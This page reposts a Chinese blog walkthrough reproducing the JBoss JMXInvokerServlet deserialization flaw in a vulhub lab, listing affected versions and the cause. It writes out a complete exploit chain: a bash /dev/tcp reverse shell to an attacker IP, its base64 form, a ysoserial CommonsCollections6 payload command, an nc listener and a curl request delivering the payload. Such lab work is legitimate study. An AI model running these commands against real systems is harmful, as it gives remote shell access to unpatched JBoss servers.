码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • Jboss JMXInvokerServlet-deserialization漏洞复现


    Jboss JMXInvokerServlet-deserialization漏洞复现

    影响范围

    JBoss Enterprise Application Platform 6.4.4,5.2.0,4.3.0_CP10
    JBoss AS (Wildly) 6 and earlier
    JBoss A-MQ 6.2.0
    JBoss Fuse 6.2.0
    JBoss SOA Platform (SOA-P) 5.3.1
    JBoss Data Grid (JDG) 6.5.0
    JBoss BRMS (BRMS) 6.1.0
    JBoss BPMS (BPMS) 6.1.0
    JBoss Data Virtualization (JDV) 6.1.0
    JBoss Fuse Service Works (FSW) 6.0.0
    JBoss Enterprise Web Server (EWS) 2.1,3.0

    漏洞成因

    JBoss在/invoker/JMXInvokerServlet请求中读取了用户传入的对象,然后我们利用Apache Commons Collections中的Gadget执行任意代码。

    漏洞利用

    环境准备
    名称IP
    攻击机192.168.159.174
    靶机192.168.159.129

    首先输入以下命令进入vulhub里启动靶场,然后在攻击机里访问http://192.168.159.129:8080即可

    cd vulhub-master/jboss/JMXInvokerServlet-deserialization
    docker-compose up -d
    
    • 1
    • 2

    image-20220908110234697

    漏洞复现

    首先准备好生成payload的工具:ysoserial.jar

    然后准备好反弹shell的命令,需要对其进行base64加密

    //反弹shell命令,注意替换为自己的
    bash -i >& /dev/tcp/192.168.159.174/6666 0>&1
    //base64加密
    YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE1OS4xNzQvNjY2NiAwPiYx
    
    • 1
    • 2
    • 3
    • 4
    java  -jar  ysoserial.jar  CommonsCollections6 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE1OS4xNzQvNjY2NiAwPiYx}|{base64,-d}|{bash,-i}" > poc.ser
    
    • 1

    执行完上述命令会生成一个poc.ser文件,接下来新打开一个cmd窗口执行以下命令:

    nc -lvvp 6666
    
    • 1

    监听启动后再执行下述指令:

    curl http://192.168.159.129:8080/invoker/readonly --data-binary @poc.ser
    
    • 1

    可以看到如下图,反弹shell成功,此漏洞利用成功

    image-20220908113311753

  • 相关阅读:
    What are the basic mathematical knowledge in computer graphics?
    数学建模--Topsis评价方法的Python实现
    【云原生之kubernetes实战】在k8s环境下部署Lychee照片管理平台
    3D帧间匹配-----剔除动态障碍物
    Hadoop3教程(一):Hadoop的定义、组成及全生态概览
    【Java面试】听说Java求职者/面试官都关注了我,这道面试题一个空Object对象的占多大空间?你答的上来吗
    Ingress:比Service更强大的服务暴露与负载均衡
    Python 搭建 FastAPI 项目
    Mybatis动态SQL
    小白也能搞通UDP通信(88E1111 RGMII 接口)
  • 原文地址:https://blog.csdn.net/u014536801/article/details/126782059
  • 最新文章
  • 攻防演习之三天拿下官网站群
    数据安全治理学习——前期安全规划和安全管理体系建设
    企业安全 | 企业内一次钓鱼演练准备过程
    内网渗透测试 | Kerberos协议及其部分攻击手法
    0day的产生 | 不懂代码的"代码审计"
    安装scrcpy-client模块av模块异常,环境问题解决方案
    leetcode hot100【LeetCode 279. 完全平方数】java实现
    OpenWrt下安装Mosquitto
    AnatoMask论文汇总
    【AI日记】24.11.01 LangChain、openai api和github copilot
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1
正则表达式工具 cron表达式工具 密码生成工具

京公网安备 11010502049817号